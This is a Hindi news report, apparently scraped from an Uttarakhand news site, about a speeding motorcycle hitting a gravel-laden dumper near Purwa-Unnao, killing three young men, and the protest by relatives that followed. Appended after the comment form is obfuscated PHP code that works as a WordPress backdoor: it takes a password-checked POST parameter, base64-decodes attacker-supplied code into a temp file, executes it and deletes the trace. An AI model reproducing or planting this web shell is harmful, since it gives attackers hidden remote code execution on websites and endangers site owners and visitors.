दर्दनाक हादसा: बेकाबू डंपर ने बाइक सवारों को मारी टक्कर, तीन की मौके पर ही मौत

Uttarakhand Press 01 August 2023: पुरवा-उन्नाव मार्ग पर खरगीखेड़ा गांव के पास तेज रफ्तार बाइक सामने से आ रहे गिट्टी लदे डंपर से टकरा गई। घटना में बाइक में बैठे तीनों युवकों की मौके पर ही मौत हो गई। घटना के बाद डंपर चालक गाड़ी छोड़कर भाग निकला। कोतवाल फोर्स के साथ पहुंचे और आनन फानन दो शव तो गाड़ी में डाल लिए। तीसरे शव को उठाने तक परिजन पहुंच गए और हंगामा करने लगे।

पुलिस ने समझाया और तीसरा शव भी डाल लिया। उसके बाद परिजन फिर आक्रोशित हो गए और शव लदे वाहन के आगे बाइक खड़ी कर सड़क पर लेट गए। घटना की सूचना पर सीओ के साथ तीन थानों की फोर्स मौके पर पहुंची और परिजनों को समझाने का प्रयास किया। समाचार लिखे जाने तक परिजन घटनास्थल पर ही थे। बाइक सवार हेलमेट नहीं लगाए थे। आक्रोशित भीड़ ने कोतवाल से भी हाथापाई का प्रयास किया।

अचलगंज थानाक्षेत्र के मीरपुर गांव निवासी नन्हकू यादव का पुत्र सरवन (27) गांव के ही साथी हीरालाल गौतम के पुत्र पप्पू (26) और हसनगंज कोतवाली के गांव गौरी सलोनपुर निवासी हरिश्चंद्र शुक्ल के पुत्र अंकित (24) के साथ बाइक से सोमवार शाम करीब सात बजे पुरवा स्थित एक मोबाइल दुकान पर आए थे। मोबाइल सही कराने के बाद रात करीब 8.15 बजे तीनों बाइक से घर जा रहे थे। बाइक सरवन चला रहा था। बाइक की रफ्तार इतनी तेज थी कि उन्नाव-पुरवा मार्ग पर खरगीखेड़ा गांव के पास गिट्टी लदा डंपर सामने से आता देख सरवन उसे संभाल नहीं सका और बाइक अनियंत्रित होकर सामने से आ रहे डंपर में टकरा गई। सिर में हेलमेट न लगाए होने से तीनों युवकों के सिर में चोट आई। घटनास्थल में ही तीनों की मौत हो गई।

घटना की सूचना पर पुरवा कोतवाल सुरेश सिंह और मंगतखेड़ा चौकी इंचार्ज सियाराम चौरसिया फोर्स के साथ पहुंचे। सरवन और पप्पू का शव तो उन्होंने गाड़ियों में डाल लिया लेकिन अंकित का शव डालने के दौरान परिजन पहुंच गए। इससे वह हंगामा करने लगे। कोतवाल ने समझा बुझाकर तीनों शव तो पिकअप में लदवा लिए लेकिन बाद में परिजन और ग्रामीण आ जाने से फिर हंगामा शुरू हो गया। शव लदे वाहन के आगे बाइकें खड़ी कर खुद सडक़ पर लेट गए। घटना की सूचना पर सीओ दीपक सिंह तीन थानों दही, असोहा व मौरावां की फोर्स के साथ मौके पर पहुंचे और परिजनों को समझाने का प्रयास किया। समाचार लिखे जाने तक परिजन शांत नहीं हुए थे। कोतवाल सुरेश सिंह ने बताया कि बाइक की रफ्तार तेज थी। प्रत्यक्षदर्शियों के मुताबिक सड़क पर लहराकर बाइक चला रहे थे। जिससे सामने से डंपर में घुस गए। शव उठाने का प्रयास जारी है।

Read Previous

Uttarakhand Weather Alert: उत्तराखंड में 4 अगस्त तक ज्यादातर जगहों पर भारी वर्षा का अलर्ट जारी

Read Next

Maharashtra Accident: समृद्धि एक्सप्रेस-वे पर गर्डर लॉन्चिंग मशीन गिरने से 17 की मौत, पीएम-सीएम ने घटना पर जताया दुख

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}